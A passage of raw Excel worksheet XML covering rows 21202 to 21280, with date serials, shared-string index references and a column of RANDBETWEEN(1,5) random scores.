        <v>3</v>
      </c>
    </row>
    <row r="21202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21202" s="1">
        <v>43084.56449074074</v>
      </c>
      <c r="C21202" t="s">
        <v>10</v>
      </c>
      <c r="D21202" t="s">
        <v>178</v>
      </c>
      <c r="E21202" t="s">
        <v>19096</v>
      </c>
      <c r="F21202">
        <f t="shared" ca="1" si="331"/>
        <v>4</v>
      </c>
    </row>
    <row r="21203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21203" s="1">
        <v>43084.551874999997</v>
      </c>
      <c r="C21203" t="s">
        <v>10</v>
      </c>
      <c r="D21203" t="s">
        <v>33</v>
      </c>
      <c r="E21203" t="s">
        <v>19097</v>
      </c>
      <c r="F21203">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21204" s="1">
        <v>43084.507418981484</v>
      </c>
      <c r="C21204" t="s">
        <v>10</v>
      </c>
      <c r="D21204" t="s">
        <v>494</v>
      </c>
      <c r="E21204" t="s">
        <v>19098</v>
      </c>
      <c r="F21204">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21205" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21205" s="1">
        <v>43084.502997685187</v>
      </c>
      <c r="C21205" t="s">
        <v>6</v>
      </c>
      <c r="D21205" t="s">
        <v>25</v>
      </c>
      <c r="E21205" s="2" t="s">
        <v>19099</v>
      </c>
      <c r="F21205">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21206" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21206" s="1">
        <v>43084.502557870372</v>
      </c>
      <c r="C21206" t="s">
        <v>6</v>
      </c>
      <c r="D21206" t="s">
        <v>114</v>
      </c>
      <c r="E21206" t="s">
        <v>19100</v>
      </c>
      <c r="F21206">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21207" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21207" s="1">
        <v>43084.462916666664</v>
      </c>
      <c r="C21207" t="s">
        <v>10</v>
      </c>
      <c r="D21207" t="s">
        <v>192</v>
      </c>
      <c r="E21207" t="s">
        <v>19101</v>
      </c>
      <c r="F21207">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21208" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21208" s="1">
        <v>43084.456562500003</v>
      </c>
      <c r="C21208" t="s">
        <v>10</v>
      </c>
      <c r="D21208" t="s">
        <v>158</v>
      </c>
      <c r="E21208" s="2" t="s">
        <v>19102</v>
      </c>
      <c r="F21208">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21209" s="1">
        <v>43084.449328703704</v>
      </c>
      <c r="C21209" t="s">
        <v>10</v>
      </c>
      <c r="D21209" t="s">
        <v>36</v>
      </c>
      <c r="E21209" t="s">
        <v>19103</v>
      </c>
      <c r="F21209">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21210" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21210" s="1">
        <v>43084.420949074076</v>
      </c>
      <c r="C21210" t="s">
        <v>10</v>
      </c>
      <c r="D21210" t="s">
        <v>52</v>
      </c>
      <c r="E21210" s="2" t="s">
        <v>19104</v>
      </c>
      <c r="F21210">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21211" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21211" s="1">
        <v>43084.418009259258</v>
      </c>
      <c r="C21211" t="s">
        <v>65</v>
      </c>
      <c r="E21211" s="2" t="s">
        <v>19105</v>
      </c>
      <c r="F21211">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21212" s="1">
        <v>43084.390185185184</v>
      </c>
      <c r="C21212" t="s">
        <v>10</v>
      </c>
      <c r="D21212" t="s">
        <v>112</v>
      </c>
      <c r="E21212" t="s">
        <v>19106</v>
      </c>
      <c r="F21212">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21213" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21213" s="1">
        <v>43084.361932870372</v>
      </c>
      <c r="C21213" t="s">
        <v>10</v>
      </c>
      <c r="D21213" t="s">
        <v>80</v>
      </c>
      <c r="E21213" t="s">
        <v>19107</v>
      </c>
      <c r="F21213">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21214" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21214" s="1">
        <v>43084.313483796293</v>
      </c>
      <c r="C21214" t="s">
        <v>60</v>
      </c>
      <c r="E21214" t="s">
        <v>19108</v>
      </c>
      <c r="F21214">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21215" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21215" s="1">
        <v>43084.271157407406</v>
      </c>
      <c r="C21215" t="s">
        <v>71</v>
      </c>
      <c r="D21215" t="s">
        <v>312</v>
      </c>
      <c r="E21215" s="2" t="s">
        <v>19109</v>
      </c>
      <c r="F21215">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21216" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21216" s="1">
        <v>43084.266817129632</v>
      </c>
      <c r="C21216" t="s">
        <v>48</v>
      </c>
      <c r="E21216" s="2" t="s">
        <v>19110</v>
      </c>
      <c r="F21216">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21217" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21217" s="1">
        <v>43084.237928240742</v>
      </c>
      <c r="C21217" t="s">
        <v>48</v>
      </c>
      <c r="E21217" t="s">
        <v>19111</v>
      </c>
      <c r="F21217">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21218" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21218" s="1">
        <v>43084.095254629632</v>
      </c>
      <c r="C21218" t="s">
        <v>301</v>
      </c>
      <c r="E21218" t="s">
        <v>19112</v>
      </c>
      <c r="F21218">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21219" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21219" s="1">
        <v>43083.976226851853</v>
      </c>
      <c r="C21219" t="s">
        <v>319</v>
      </c>
      <c r="E21219" s="2" t="s">
        <v>19113</v>
      </c>
      <c r="F21219">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21220" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21220" s="1">
        <v>43083.961122685185</v>
      </c>
      <c r="C21220" t="s">
        <v>479</v>
      </c>
      <c r="D21220" t="s">
        <v>713</v>
      </c>
      <c r="E21220" s="2" t="s">
        <v>19114</v>
      </c>
      <c r="F21220">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21221" s="1">
        <v>43083.959328703706</v>
      </c>
      <c r="C21221" t="s">
        <v>41</v>
      </c>
      <c r="E21221" t="s">
        <v>19115</v>
      </c>
      <c r="F21221">
        <f t="shared" ca="1" si="331"/>
        <v>4</v>
      </c>
    </row>
    <row r="21222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21222" s="1">
        <v>43083.953159722223</v>
      </c>
      <c r="C21222" t="s">
        <v>41</v>
      </c>
      <c r="E21222" t="s">
        <v>19116</v>
      </c>
      <c r="F21222">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21223" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21223" s="1">
        <v>43083.915983796294</v>
      </c>
      <c r="C21223" t="s">
        <v>410</v>
      </c>
      <c r="D21223" t="s">
        <v>336</v>
      </c>
      <c r="E21223" s="2" t="s">
        <v>19117</v>
      </c>
      <c r="F21223">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21224" s="1">
        <v>43083.761469907404</v>
      </c>
      <c r="C21224" t="s">
        <v>10</v>
      </c>
      <c r="D21224" t="s">
        <v>20</v>
      </c>
      <c r="E21224" t="s">
        <v>19118</v>
      </c>
      <c r="F21224">
        <f t="shared" ca="1" si="331"/>
        <v>4</v>
      </c>
    </row>
    <row r="21225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21225" s="1">
        <v>43083.741828703707</v>
      </c>
      <c r="C21225" t="s">
        <v>10</v>
      </c>
      <c r="D21225" t="s">
        <v>6</v>
      </c>
      <c r="E21225" t="s">
        <v>19119</v>
      </c>
      <c r="F21225">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21226" s="1">
        <v>43083.736990740741</v>
      </c>
      <c r="C21226" t="s">
        <v>10</v>
      </c>
      <c r="D21226" t="s">
        <v>6</v>
      </c>
      <c r="E21226" t="s">
        <v>19120</v>
      </c>
      <c r="F21226">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21227" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21227" s="1">
        <v>43083.71979166667</v>
      </c>
      <c r="C21227" t="s">
        <v>10</v>
      </c>
      <c r="D21227" t="s">
        <v>6</v>
      </c>
      <c r="E21227" t="s">
        <v>19121</v>
      </c>
      <c r="F21227">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21228" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21228" s="1">
        <v>43083.661863425928</v>
      </c>
      <c r="C21228" t="s">
        <v>7580</v>
      </c>
      <c r="D21228" t="s">
        <v>23</v>
      </c>
      <c r="E21228" s="2" t="s">
        <v>19122</v>
      </c>
      <c r="F21228">
        <f t="shared" ca="1" si="331"/>
        <v>4</v>
      </c>
    </row>
    <row r="21229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21229" s="1">
        <v>43083.657465277778</v>
      </c>
      <c r="C21229" t="s">
        <v>6</v>
      </c>
      <c r="D21229" t="s">
        <v>25</v>
      </c>
      <c r="E21229" t="s">
        <v>19123</v>
      </c>
      <c r="F21229">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21230" s="1">
        <v>43083.657349537039</v>
      </c>
      <c r="C21230" t="s">
        <v>430</v>
      </c>
      <c r="E21230" t="s">
        <v>19124</v>
      </c>
      <c r="F21230">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21231" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21231" s="1">
        <v>43083.648287037038</v>
      </c>
      <c r="C21231" t="s">
        <v>10</v>
      </c>
      <c r="E21231" s="2" t="s">
        <v>19125</v>
      </c>
      <c r="F21231">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21232" s="1">
        <v>43083.646562499998</v>
      </c>
      <c r="C21232" t="s">
        <v>10</v>
      </c>
      <c r="E21232" t="s">
        <v>19126</v>
      </c>
      <c r="F21232">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21233" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21233" s="1">
        <v>43083.625590277778</v>
      </c>
      <c r="C21233" t="s">
        <v>10</v>
      </c>
      <c r="D21233" t="s">
        <v>20</v>
      </c>
      <c r="E21233" s="2" t="s">
        <v>19127</v>
      </c>
      <c r="F21233">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21234" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21234" s="1">
        <v>43083.620787037034</v>
      </c>
      <c r="C21234" t="s">
        <v>10</v>
      </c>
      <c r="D21234" t="s">
        <v>41</v>
      </c>
      <c r="E21234" s="2" t="s">
        <v>19128</v>
      </c>
      <c r="F21234">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21235" s="1">
        <v>43083.599687499998</v>
      </c>
      <c r="C21235" t="s">
        <v>10</v>
      </c>
      <c r="D21235" t="s">
        <v>6</v>
      </c>
      <c r="E21235" t="s">
        <v>19129</v>
      </c>
      <c r="F21235">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21236" s="1">
        <v>43083.587048611109</v>
      </c>
      <c r="C21236" t="s">
        <v>721</v>
      </c>
      <c r="E21236" t="s">
        <v>19130</v>
      </c>
      <c r="F21236">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21237" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21237" s="1">
        <v>43083.542546296296</v>
      </c>
      <c r="C21237" t="s">
        <v>280</v>
      </c>
      <c r="E21237" s="2" t="s">
        <v>19131</v>
      </c>
      <c r="F21237">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21238" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A21238" s="1">
        <v>43083.537465277775</v>
      </c>
      <c r="C21238" t="s">
        <v>10</v>
      </c>
      <c r="D21238" t="s">
        <v>56</v>
      </c>
      <c r="E21238" s="2" t="s">
        <v>19132</v>
      </c>
      <c r="F21238">
        <f t="shared" ca="1" si="331"/>
        <v>4</v>
      </c>
    </row>
    <row r="21239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21239" s="1">
        <v>43083.532476851855</v>
      </c>
      <c r="C21239" t="s">
        <v>10</v>
      </c>
      <c r="D21239" t="s">
        <v>56</v>
      </c>
      <c r="E21239" t="s">
        <v>19133</v>
      </c>
      <c r="F21239">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21240" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21240" s="1">
        <v>43083.449942129628</v>
      </c>
      <c r="C21240" t="s">
        <v>6</v>
      </c>
      <c r="D21240" t="s">
        <v>25</v>
      </c>
      <c r="E21240" s="2" t="s">
        <v>19134</v>
      </c>
      <c r="F21240">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21241" s="1">
        <v>43083.447245370371</v>
      </c>
      <c r="C21241" t="s">
        <v>65</v>
      </c>
      <c r="D21241" t="s">
        <v>312</v>
      </c>
      <c r="E21241" t="s">
        <v>19135</v>
      </c>
      <c r="F21241">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21242" s="1">
        <v>43083.435578703706</v>
      </c>
      <c r="C21242" t="s">
        <v>6</v>
      </c>
      <c r="D21242" t="s">
        <v>25</v>
      </c>
      <c r="E21242" t="s">
        <v>19136</v>
      </c>
      <c r="F21242">
        <f t="shared" ca="1" si="331"/>
        <v>4</v>
      </c>
    </row>
    <row r="21243" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21243" s="1">
        <v>43083.41605324074</v>
      </c>
      <c r="C21243" t="s">
        <v>65</v>
      </c>
      <c r="E21243" s="2" t="s">
        <v>19137</v>
      </c>
      <c r="F21243">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21244" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21244" s="1">
        <v>43083.326365740744</v>
      </c>
      <c r="C21244" t="s">
        <v>71</v>
      </c>
      <c r="E21244" s="2" t="s">
        <v>19138</v>
      </c>
      <c r="F21244">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21245" s="1">
        <v>43083.326064814813</v>
      </c>
      <c r="C21245" t="s">
        <v>6</v>
      </c>
      <c r="D21245" t="s">
        <v>25</v>
      </c>
      <c r="E21245" t="s">
        <v>19139</v>
      </c>
      <c r="F21245">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21246" s="1">
        <v>43083.281238425923</v>
      </c>
      <c r="C21246" t="s">
        <v>189</v>
      </c>
      <c r="E21246" t="s">
        <v>19140</v>
      </c>
      <c r="F21246">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21247" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21247" s="1">
        <v>43083.247511574074</v>
      </c>
      <c r="C21247" t="s">
        <v>65</v>
      </c>
      <c r="E21247" s="2" t="s">
        <v>19141</v>
      </c>
      <c r="F21247">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21248" s="1">
        <v>43083.243020833332</v>
      </c>
      <c r="C21248" t="s">
        <v>173</v>
      </c>
      <c r="E21248" t="s">
        <v>19142</v>
      </c>
      <c r="F21248">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21249" s="1">
        <v>43083.204386574071</v>
      </c>
      <c r="C21249" t="s">
        <v>48</v>
      </c>
      <c r="E21249" t="s">
        <v>19143</v>
      </c>
      <c r="F21249">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21250" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21250" s="1">
        <v>43083.198969907404</v>
      </c>
      <c r="C21250" t="s">
        <v>65</v>
      </c>
      <c r="E21250" s="2" t="s">
        <v>19144</v>
      </c>
      <c r="F21250">
        <f t="shared" ref="F21250:F21313" ca="1" si="332">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="21251" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21251" s="1">
        <v>43083.174375000002</v>
      </c>
      <c r="C21251" t="s">
        <v>559</v>
      </c>
      <c r="D21251" t="s">
        <v>312</v>
      </c>
      <c r="E21251" s="2" t="s">
        <v>19145</v>
      </c>
      <c r="F21251">
        <f t="shared" ca="1" si="332"/>
        <v>3</v>
      </c>
    </row>
    <row r="21252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21252" s="1">
        <v>43083.170763888891</v>
      </c>
      <c r="C21252" t="s">
        <v>10</v>
      </c>
      <c r="D21252" t="s">
        <v>1056</v>
      </c>
      <c r="E21252" t="s">
        <v>19146</v>
      </c>
      <c r="F21252">
        <f t="shared" ca="1" si="332"/>
        <v>2</v>
      </c>
    </row>
    <row r="21253" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21253" s="1">
        <v>43083.168564814812</v>
      </c>
      <c r="C21253" t="s">
        <v>71</v>
      </c>
      <c r="E21253" s="2" t="s">
        <v>19147</v>
      </c>
      <c r="F21253">
        <f t="shared" ca="1" si="332"/>
        <v>5</v>
      </c>
    </row>
    <row r="21254" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A21254" s="1">
        <v>43083.131724537037</v>
      </c>
      <c r="C21254" t="s">
        <v>48</v>
      </c>
      <c r="E21254" s="2" t="s">
        <v>19148</v>
      </c>
      <c r="F21254">
        <f t="shared" ca="1" si="332"/>
        <v>2</v>
      </c>
    </row>
    <row r="21255" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A21255" s="1">
        <v>43083.118738425925</v>
      </c>
      <c r="C21255" t="s">
        <v>410</v>
      </c>
      <c r="E21255" s="2" t="s">
        <v>19149</v>
      </c>
      <c r="F21255">
        <f t="shared" ca="1" si="332"/>
        <v>4</v>
      </c>
    </row>
    <row r="21256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21256" s="1">
        <v>43083.054479166669</v>
      </c>
      <c r="C21256" t="s">
        <v>10</v>
      </c>
      <c r="D21256" t="s">
        <v>6</v>
      </c>
      <c r="E21256" t="s">
        <v>19150</v>
      </c>
      <c r="F21256">
        <f t="shared" ca="1" si="332"/>
        <v>5</v>
      </c>
    </row>
    <row r="21257" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21257" s="1">
        <v>43083.035497685189</v>
      </c>
      <c r="C21257" t="s">
        <v>140</v>
      </c>
      <c r="D21257" t="s">
        <v>234</v>
      </c>
      <c r="E21257" s="2" t="s">
        <v>19151</v>
      </c>
      <c r="F21257">
        <f t="shared" ca="1" si="332"/>
        <v>5</v>
      </c>
    </row>
    <row r="21258" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21258" s="1">
        <v>43083.019432870373</v>
      </c>
      <c r="C21258" t="s">
        <v>454</v>
      </c>
      <c r="D21258" t="s">
        <v>67</v>
      </c>
      <c r="E21258" s="2" t="s">
        <v>19152</v>
      </c>
      <c r="F21258">
        <f t="shared" ca="1" si="332"/>
        <v>2</v>
      </c>
    </row>
    <row r="21259" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21259" s="1">
        <v>43082.980717592596</v>
      </c>
      <c r="C21259" t="s">
        <v>2428</v>
      </c>
      <c r="E21259" s="2" t="s">
        <v>19153</v>
      </c>
      <c r="F21259">
        <f t="shared" ca="1" si="332"/>
        <v>5</v>
      </c>
    </row>
    <row r="21260" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21260" s="1">
        <v>43082.967905092592</v>
      </c>
      <c r="C21260" t="s">
        <v>10</v>
      </c>
      <c r="D21260" t="s">
        <v>46</v>
      </c>
      <c r="E21260" s="2" t="s">
        <v>19154</v>
      </c>
      <c r="F21260">
        <f t="shared" ca="1" si="332"/>
        <v>2</v>
      </c>
    </row>
    <row r="21261" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21261" s="1">
        <v>43082.832974537036</v>
      </c>
      <c r="C21261" t="s">
        <v>7495</v>
      </c>
      <c r="D21261" t="s">
        <v>480</v>
      </c>
      <c r="E21261" s="2" t="s">
        <v>19155</v>
      </c>
      <c r="F21261">
        <f t="shared" ca="1" si="332"/>
        <v>2</v>
      </c>
    </row>
    <row r="21262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21262" s="1">
        <v>43082.797372685185</v>
      </c>
      <c r="C21262" t="s">
        <v>10</v>
      </c>
      <c r="D21262" t="s">
        <v>71</v>
      </c>
      <c r="E21262" t="s">
        <v>19156</v>
      </c>
      <c r="F21262">
        <f t="shared" ca="1" si="332"/>
        <v>4</v>
      </c>
    </row>
    <row r="21263" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A21263" s="1">
        <v>43082.706018518518</v>
      </c>
      <c r="C21263" t="s">
        <v>5239</v>
      </c>
      <c r="E21263" s="2" t="s">
        <v>19157</v>
      </c>
      <c r="F21263">
        <f t="shared" ca="1" si="332"/>
        <v>5</v>
      </c>
    </row>
    <row r="21264" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21264" s="1">
        <v>43082.701701388891</v>
      </c>
      <c r="C21264" t="s">
        <v>10</v>
      </c>
      <c r="D21264" t="s">
        <v>667</v>
      </c>
      <c r="E21264" t="s">
        <v>19158</v>
      </c>
      <c r="F21264">
        <f t="shared" ca="1" si="332"/>
        <v>1</v>
      </c>
    </row>
    <row r="21265" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21265" s="1">
        <v>43082.671932870369</v>
      </c>
      <c r="C21265" t="s">
        <v>2210</v>
      </c>
      <c r="D21265" t="s">
        <v>71</v>
      </c>
      <c r="E21265" s="2" t="s">
        <v>19159</v>
      </c>
      <c r="F21265">
        <f t="shared" ca="1" si="332"/>
        <v>5</v>
      </c>
    </row>
    <row r="21266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21266" s="1">
        <v>43082.641400462962</v>
      </c>
      <c r="C21266" t="s">
        <v>10</v>
      </c>
      <c r="D21266" t="s">
        <v>163</v>
      </c>
      <c r="E21266" t="s">
        <v>19160</v>
      </c>
      <c r="F21266">
        <f t="shared" ca="1" si="332"/>
        <v>3</v>
      </c>
    </row>
    <row r="21267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21267" s="1">
        <v>43082.638182870367</v>
      </c>
      <c r="C21267" t="s">
        <v>10</v>
      </c>
      <c r="D21267" t="s">
        <v>17</v>
      </c>
      <c r="F21267">
        <f t="shared" ca="1" si="332"/>
        <v>1</v>
      </c>
    </row>
    <row r="21268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21268" s="1">
        <v>43082.634155092594</v>
      </c>
      <c r="C21268" t="s">
        <v>10</v>
      </c>
      <c r="D21268" t="s">
        <v>381</v>
      </c>
      <c r="E21268" t="s">
        <v>19161</v>
      </c>
      <c r="F21268">
        <f t="shared" ca="1" si="332"/>
        <v>3</v>
      </c>
    </row>
    <row r="21269" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21269" s="1">
        <v>43082.608483796299</v>
      </c>
      <c r="C21269" t="s">
        <v>10</v>
      </c>
      <c r="D21269" t="s">
        <v>56</v>
      </c>
      <c r="E21269" s="2" t="s">
        <v>19162</v>
      </c>
      <c r="F21269">
        <f t="shared" ca="1" si="332"/>
        <v>3</v>
      </c>
    </row>
    <row r="21270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21270" s="1">
        <v>43082.604826388888</v>
      </c>
      <c r="C21270" t="s">
        <v>260</v>
      </c>
      <c r="F21270">
        <f t="shared" ca="1" si="332"/>
        <v>4</v>
      </c>
    </row>
    <row r="21271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21271" s="1">
        <v>43082.601331018515</v>
      </c>
      <c r="C21271" t="s">
        <v>721</v>
      </c>
      <c r="E21271" t="s">
        <v>19163</v>
      </c>
      <c r="F21271">
        <f t="shared" ca="1" si="332"/>
        <v>5</v>
      </c>
    </row>
    <row r="21272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21272" s="1">
        <v>43082.573206018518</v>
      </c>
      <c r="C21272" t="s">
        <v>16</v>
      </c>
      <c r="E21272" t="s">
        <v>19164</v>
      </c>
      <c r="F21272">
        <f t="shared" ca="1" si="332"/>
        <v>3</v>
      </c>
    </row>
    <row r="21273" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21273" s="1">
        <v>43082.564699074072</v>
      </c>
      <c r="C21273" t="s">
        <v>16</v>
      </c>
      <c r="E21273" s="2" t="s">
        <v>19165</v>
      </c>
      <c r="F21273">
        <f t="shared" ca="1" si="332"/>
        <v>3</v>
      </c>
    </row>
    <row r="21274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21274" s="1">
        <v>43082.561307870368</v>
      </c>
      <c r="C21274" t="s">
        <v>10</v>
      </c>
      <c r="D21274" t="s">
        <v>80</v>
      </c>
      <c r="E21274" t="s">
        <v>19166</v>
      </c>
      <c r="F21274">
        <f t="shared" ca="1" si="332"/>
        <v>2</v>
      </c>
    </row>
    <row r="21275" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21275" s="1">
        <v>43082.515543981484</v>
      </c>
      <c r="C21275" t="s">
        <v>71</v>
      </c>
      <c r="E21275" s="2" t="s">
        <v>19167</v>
      </c>
      <c r="F21275">
        <f t="shared" ca="1" si="332"/>
        <v>5</v>
      </c>
    </row>
    <row r="21276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21276" s="1">
        <v>43082.502581018518</v>
      </c>
      <c r="C21276" t="s">
        <v>10</v>
      </c>
      <c r="D21276" t="s">
        <v>52</v>
      </c>
      <c r="F21276">
        <f t="shared" ca="1" si="332"/>
        <v>3</v>
      </c>
    </row>
    <row r="21277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21277" s="1">
        <v>43082.502233796295</v>
      </c>
      <c r="C21277" t="s">
        <v>10</v>
      </c>
      <c r="D21277" t="s">
        <v>178</v>
      </c>
      <c r="E21277" t="s">
        <v>19168</v>
      </c>
      <c r="F21277">
        <f t="shared" ca="1" si="332"/>
        <v>4</v>
      </c>
    </row>
    <row r="21278" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A21278" s="1">
        <v>43082.500810185185</v>
      </c>
      <c r="C21278" t="s">
        <v>10</v>
      </c>
      <c r="D21278" t="s">
        <v>192</v>
      </c>
      <c r="E21278" s="2" t="s">
        <v>19169</v>
      </c>
      <c r="F21278">
        <f t="shared" ca="1" si="332"/>
        <v>2</v>
      </c>
    </row>
    <row r="21279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21279" s="1">
        <v>43082.48269675926</v>
      </c>
      <c r="C21279" t="s">
        <v>10</v>
      </c>
      <c r="D21279" t="s">
        <v>263</v>
      </c>
      <c r="E21279" t="s">
        <v>19170</v>
      </c>
      <c r="F21279">
        <f t="shared" ca="1" si="332"/>
        <v>1</v>
      </c>
    </row>
    <row r="21280" spans="1:6" x14ac:dyDescent="0.25">
